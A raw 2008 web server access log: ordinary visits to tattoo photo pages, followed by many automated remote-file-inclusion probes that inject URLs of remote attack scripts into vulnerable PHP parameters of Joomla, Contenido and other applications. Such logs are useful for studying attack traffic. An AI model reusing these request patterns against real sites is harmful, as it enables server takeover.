82.203.3.7 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:08 -0600] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:08 -0600] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:08 -0600] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:08 -0600] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:08 -0600] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:09 -0600] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
216.171.98.77 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/tatd3.JPG HTTP/1.0" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/tatd4.JPG HTTP/1.0" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/tatd1.JPG HTTP/1.0" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/tatd2.JPG HTTP/1.0" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:15 -0600] "GET /tattoo/tatd6.JPG HTTP/1.0" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:16 -0600] "GET /tattoo/tatd7.JPG HTTP/1.0" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:16 -0600] "GET /tattoo/tatd10.JPG HTTP/1.0" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:16 -0600] "GET /tattoo/msameric.JPG HTTP/1.0" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:16 -0600] "GET /tattoo/tatd9.JPG HTTP/1.0" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:16 -0600] "GET /tattoo/tatd8.JPG HTTP/1.0" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
216.171.98.77 - - [03/Nov/2008:04:43:40 -0600] "GET /tattoo/bonus.htm HTTP/1.0" 200 808 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:43:40 -0600] "GET /tattoo/bonus.htm HTTP/1.0" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:41 -0600] "GET /tattoo/tate3.JPG HTTP/1.0" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:41 -0600] "GET /tattoo/tate4.JPG HTTP/1.0" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:41 -0600] "GET /tattoo/tate2.JPG HTTP/1.0" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
216.171.98.77 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
82.203.3.7 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/tat1.JPG HTTP/1.0" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/tat10.JPG HTTP/1.0" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/tat2.JPG HTTP/1.0" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:53 -0600] "GET /tattoo/tat3.jpg HTTP/1.0" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:54 -0600] "GET /tattoo/tat4.JPG HTTP/1.0" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:54 -0600] "GET /tattoo/tat5.JPG HTTP/1.0" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:54 -0600] "GET /tattoo/tat6.JPG HTTP/1.0" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:54 -0600] "GET /tattoo/tat7.JPG HTTP/1.0" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:55 -0600] "GET /tattoo/tat9.JPG HTTP/1.0" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:55 -0600] "GET /tattoo/tat8.jpg HTTP/1.0" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
207.150.183.60 - - [03/Nov/2008:04:44:15 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:04:44:16 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:04:44:17 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:04:44:23 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:04:45:18 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:04:45:18 -0600] "GET /index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:04:45:25 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:04:45:26 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
62.87.154.41 - - [03/Nov/2008:04:48:40 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:04:48:40 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
213.165.84.215 - - [03/Nov/2008:04:49:38 -0600] "GET /logs/access_log.1208044800//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.165.84.215 - - [03/Nov/2008:04:49:38 -0600] "GET //?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.165.84.215 - - [03/Nov/2008:04:49:38 -0600] "GET /logs//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
200.85.32.31 - - [03/Nov/2008:04:51:46 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
200.85.32.31 - - [03/Nov/2008:04:51:46 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
216.139.67.116 - - [03/Nov/2008:04:52:05 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.64"
216.139.67.116 - - [03/Nov/2008:04:52:05 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.64"
87.106.16.18 - - [03/Nov/2008:04:52:50 -0600] "GET /logs/access_log.1202428800/errors.php?error=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:04:52:50 -0600] "GET /logs/errors.php?error=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.51.221.135 - - [03/Nov/2008:04:53:36 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
211.51.221.135 - - [03/Nov/2008:04:53:37 -0600] "GET //include/admin.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:04:54:08 -0600] "GET //popup_window.php?site_isp_root=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
59.125.183.76 - - [03/Nov/2008:04:54:08 -0600] "GET /logs//popup_window.php?site_isp_root=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 306 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
87.106.16.18 - - [03/Nov/2008:04:55:22 -0600] "GET /logs/access_log.1202428800%20%20/errors.php?error=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:04:55:23 -0600] "GET /logs/access_log.1208044800%20%20/errors.php?error=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:04:56:28 -0600] "GET /logs/errors.php?error=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:04:56:28 -0600] "GET /logs/access_log.1202428800/errors.php?error=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.50.221.108 - - [03/Nov/2008:04:59:16 -0600] "GET /logs/access_log.1206144000/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:59:17 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:59:18 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
89.218.85.18 - - [03/Nov/2008:05:00:12 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://www.buffalosbest.com//config/robin.id??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:00:12 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://www.buffalosbest.com//config/robin.id??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:00:12 -0600] "GET //tiny_includes/config.php?dir_ws=http://www.buffalosbest.com//config/robin.id??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:00:12 -0600] "GET //tiny_includes/config.php?dir_ws=http://www.buffalosbest.com//config/robin.id??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:05:00:13 -0600] "GET /logs/access_log.1214265600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [03/Nov/2008:05:00:13 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [03/Nov/2008:05:00:13 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [03/Nov/2008:05:01:14 -0600] "GET /logs/access_log.1214265600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [03/Nov/2008:05:01:14 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.85.63.226 - - [03/Nov/2008:05:01:14 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
87.106.16.18 - - [03/Nov/2008:05:02:08 -0600] "GET /logs/access_log.1208044800/errors.php?error=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:05:02:49 -0600] "GET /logs/access_log.1208044800%20%20/errors.php?error=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:05:02:49 -0600] "GET /logs/access_log.1202428800%20%20/errors.php?error=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.218.85.18 - - [03/Nov/2008:05:02:53 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:05:02:54 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:03:53 -0600] "GET //encapscms_PATH/core/core.php?root=http://bugisku.com/chid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:05:04:00 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:05:04:00 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:05:04:43 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://bugisku.com/chid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:05:05:04 -0600] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:05:05:06 -0600] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.800"
193.53.23.32 - - [03/Nov/2008:05:05:11 -0600] "GET //?path%5Bdocroot%5D=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
207.150.183.60 - - [03/Nov/2008:05:05:14 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
207.150.183.60 - - [03/Nov/2008:05:05:14 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
207.150.183.60 - - [03/Nov/2008:05:05:15 -0600] "GET /logs/access_log.1208304000//skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
61.50.221.108 - - [03/Nov/2008:05:07:10 -0600] "GET /logs/access_log.1215302400/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
219.85.63.226 - - [03/Nov/2008:05:08:14 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:05:08:14 -0600] "GET /logs/access_log.1214265600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:05:08:21 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.73.168.38 - - [03/Nov/2008:05:17:24 -0600] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.73.168.38 - - [03/Nov/2008:05:17:24 -0600] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.73.168.38 - - [03/Nov/2008:05:17:29 -0600] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
217.73.168.38 - - [03/Nov/2008:05:17:29 -0600] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
193.53.23.32 - - [03/Nov/2008:05:18:48 -0600] "GET /logs//?path%5Bdocroot%5D=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:05:18:49 -0600] "GET //?path%5Bdocroot%5D=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:05:18:53 -0600] "GET /logs//?path%5Bdocroot%5D=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:05:18:53 -0600] "GET //?path%5Bdocroot%5D=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
78.111.80.12 - - [03/Nov/2008:05:20:41 -0600] "GET /?DOCUMENT_ROOT=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:05:20:41 -0600] "GET /logs/?DOCUMENT_ROOT=http://www.karwecka.co.uk/Joomla/administrator/help/en-GB/css/gang11/chid.txt%0D?? HTTP/1.1" 200 105501 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:05:22:23 -0600] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:05:22:23 -0600] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
62.141.48.87 - - [03/Nov/2008:05:24:18 -0600] "GET /logs/access_log.1217030400//includes/horoscope/footer.php?xoopsConfig[root_path]=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
